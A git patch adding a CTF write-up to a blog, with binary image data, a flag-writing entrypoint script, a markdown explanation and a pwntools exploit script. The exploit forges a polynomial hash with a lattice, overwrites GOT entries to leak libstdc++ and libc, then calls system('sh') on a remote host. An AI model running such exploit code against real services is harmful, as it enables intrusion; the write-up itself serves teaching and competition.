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 literal 0 HcmV?d00001 diff --git a/content/blog/ctfcup2024-olymp/entrypoint.sh b/content/blog/ctfcup2024-olymp/entrypoint.sh new file mode 100644 index 0000000..7598378 --- /dev/null +++ b/content/blog/ctfcup2024-olymp/entrypoint.sh @@ -0,0 +1,7 @@ +#!/bin/sh + +echo "$FLAG" >/flag-"$(tr -dc 'a-f0-9' >(int &)` to `puts`. Then it will be called with `std::cin` as the first argument and thus we can leak libstdc++. I thought that was enough and libstdc++ would always allocate after libc, but during final testing that turned out not to be case. + +## Leaking libc + +Leaking libc on the other hand is a bit more tricky. First we have to notice that comparing two substrings actually uses `memcmp` + +![comparing uses memcmp](compare_memcmp.png) + +We can overwrite `memcmp` with `puts` and the rest of the got with the resolvers. Then call the comparison on the same indexes (such that the first index corresponds to `memcmp` got) two times (which intern will call puts): the first to resolve puts, the second to leak it. + +## Running system + +Finally we can use the same `memcmp` trick: overwrite `memcmp` with `system`, `setvbuf` got with `"sh\x00"`, the run the comparison on `0 1`, intern calling `system("sh\x00")`. You can check the full sploit [here](sploit.py). + +## Conclusion + +Overall I thought the challenge was quite easy, but it turned to be quick tricky even after the forging of the hash was fully hinted. diff --git a/content/blog/ctfcup2024-olymp/sploit.py b/content/blog/ctfcup2024-olymp/sploit.py new file mode 100644 index 0000000..8bdca88 --- /dev/null +++ b/content/blog/ctfcup2024-olymp/sploit.py @@ -0,0 +1,150 @@ +from pwn import * +import sage.all +from sage.modules.free_module_integer import IntegerLattice +import os +import sys + +Q = 31337 +P = 2**64 +W = 31337 +MIDDLE_LETTER = ord("n") + + +def poly_hash(a): + if type(a) == str: + a = a.encode() + h = 0 + for el in a: + h = (h * Q + el) % P + return h + + +def string_for_target_hash(target: int, string_len: int = 200) -> bytes: + known = [MIDDLE_LETTER] * string_len + known_hash = poly_hash(known) + L = IntegerLattice( + [ + [W * Q ** (len(known) - i - 1)] + + [1 if j == i else 0 for j in range(len(known))] + for i in range(len(known)) + ] + + [[W * P] + [0] * len(known)] + ) + vector = L.approximate_closest_vector( + [W * (target - known_hash)] + [0] * len(known) + ) + print(vector) + return bytes(k + v for k, v in zip(known, vector[1:])) + + +setvbuf_plt = 0x404000 +memcmp_plt = 0x404008 +puts_plt_resolve = 0x4010C6 +cin_int_plt = 0x404010 +cin_int_offset = 0x132CB0 +libc_offset = 0x672870 +libstdcpp_offset = 0x272870 +libc_offset = 0x87BD0 +system_offset = 0x000000000058740 +puts_got = 0x4010C0 +HOST = sys.argv[1] +PORT = 1717 + + +def main(): + # io = process( + # [ + # "docker", + # "run", + # "-i", + # "-v", + # f"{os.getcwd()}:/kek", + # "ubuntu@sha256:8a37d68f4f73ebf3d4efafbcf66379bf3728902a8038616808f04e34a9ab63ee", + # "/kek/a.out", + # ] + # ) + io = remote(HOST, PORT) + + io.sendline(b"10") + io.sendline(b"a") + io.sendline(b"0") + # s = string_for_target_hash(setvbuf_plt) + s = b"nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnmnnnononnomnomnonpmnlnomoonnnonnponnonnmnonn" + print(hex(poly_hash(s))) + + io.sendline(s) + io.sendline(b"1") + io.sendline(b"0 1 0 1") + io.readline() + io.sendline((p64(puts_got) * 3)[:-1]) + for _ in range(4): + io.readline() + libstdcpp_leak = u64(io.readline()[:-1].ljust(8, b"\x00")) + print("LIBSTDC++ leak", hex(libstdcpp_leak)) + libstdcpp_base = libstdcpp_leak - libstdcpp_offset + print("LIBSTDC++ base", hex(libstdcpp_base)) + cin_int = libstdcpp_base + cin_int_offset + io.readline() + io.readline() + # + payload = b"".join( + map( + p64, + ( + puts_got, + puts_got, + cin_int, + 0x401066, + 0x401076, + 0x401086, + 0x401096, + 0x4010A6, + 0x4010B6, + 0x4010C6, + 0x4010D6, + 0x4010E6, + ), + ) + )[:-1] + print(len(payload)) + + pause() + io.sendline(payload) + + io.sendline(b"2") + io.sendline(b"72 80 72 80") + io.sendline(b"72 80 72 80") + io.recvline() + io.recvline() + libc_leak = u64(io.readline()[:-1].ljust(8, b"\x00")) + print("LIBC LEAK", hex(libc_leak)) + libc_base = libc_leak - libc_offset + print("LIBC BASE", libc_base) + system = libc_base + system_offset + payload = b"".join( + map( + p64, + ( + u64(b"sh" + b"\x00" * 6), + system, + cin_int, + 0x401066, + 0x401076, + 0x401086, + 0x401096, + 0x4010A6, + 0x4010B6, + 0x4010C6, + 0x4010D6, + 0x4010E6, + ), + ) + )[:-1] + io.sendline(payload) + io.sendline(b"1") + io.sendline(b"0 1 0 1") + io.interactive() + + +if __name__ == "__main__": + main() From dcd6aabb7271eb54efeed13f917f29f4b9fdf534 Mon Sep 17 00:00:00 2001 From: b1r1b1r1 <48091103+b1r1b1r1@users.noreply.github.com> Date: Fri, 1 Nov 2024 23:08:45 +0100 Subject: [PATCH 2/2] fix --- .../blog/ctfcup2024-olymp/compare_memcmp.png | Bin 28381 -> 0 bytes .../blog/ctfcup2024-olymp/compare_memcmp.webp | Bin 0 -> 13804 bytes content/blog/ctfcup2024-olymp/index.md | 26 ++++++++++-------- 3 files changed, 14 insertions(+), 12 deletions(-) delete mode 100644 content/blog/ctfcup2024-olymp/compare_memcmp.png create mode 100644 content/blog/ctfcup2024-olymp/compare_memcmp.webp diff --git a/content/blog/ctfcup2024-olymp/compare_memcmp.png b/content/blog/ctfcup2024-olymp/compare_memcmp.png deleted file mode 100644 index c6d0c19cae2e29beb6ffd9520d1a2cd723e50947..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 28381 